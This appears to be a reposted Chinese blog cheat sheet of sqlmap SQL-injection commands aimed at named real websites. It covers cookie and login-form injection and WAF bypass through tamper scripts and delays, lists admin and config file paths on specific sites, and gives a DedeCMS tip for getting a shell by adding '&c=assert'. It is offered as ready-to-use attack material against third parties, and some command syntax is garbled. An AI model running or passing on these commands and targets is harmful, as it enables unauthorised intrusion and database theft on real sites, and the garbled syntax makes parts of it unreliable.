标签:
sqlmap.py -u "http://www.thinkpadstore.cn/search.php" --cookie "keywords=WCRTESTINPUT000000" --dbs --level 2
sqlmap.py -u "http://www.etr.com.cn/index.php?m=yp&c=index&a=list_company&catid=5" --tamper xforwardedfor.py --time-sec=20000 --delay=20
织梦模板后缀广告管理 拿shell添加代码“&c=assert”
http://www.sinomep.com/pb-admin/error.php
http://www.sinomep.com/pb-admin/error.php
http://www.pcbtech.net/upimg/userup/99/0703/config.php
请求延迟注入:访问页面两次报错 然后恢复正常
sqlmap.py --dbs -u "url" delay {设置秒数};
sqlmap.py --dbs -u "url" --safe--freq {设置次数};
cookie注入
sqlmap.py - u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2
post登陆框注入
1、burpsuite抓包 sqlmap.py -r {文本注入}ptfUPass
2、sqlmap.py -u "url" --from {自动判断注入}
3、sqlmap.py -u "url" --data"tFUName=1&tfUPass=1" {指定登陆框参数注入}
绕过waf防火墙注入
sqlmap.py -u "http://www.xjbtedu.cn/bbs/index.asp?lm=825" -v 3 --dbs --batch --tamper "space2hash.py"
sqlmap.py -u "http://www.jieshun.cn.com/en/show.php?contentid=4368=" —tamper xforwardedfor.py —time-sec=2000 —delay=5
sqlmap.py -u "http://www.cssd.com.cn/show_jtyw.asp?id=343" —tamper xforwardedfor.py —time-sec=2000 —delay=5
延时过狗 : sqlmap.py -u "http://www.chem.com.cn/S_Product.aspx?keyword=%
C2%C8%BB%AF%EF%A7" -v 3 -tamper "space2comment.py" -time-sec=5 --batch -p "id"
标签:
原文地址:http://www.cnblogs.com/milantgh/p/4711689.html
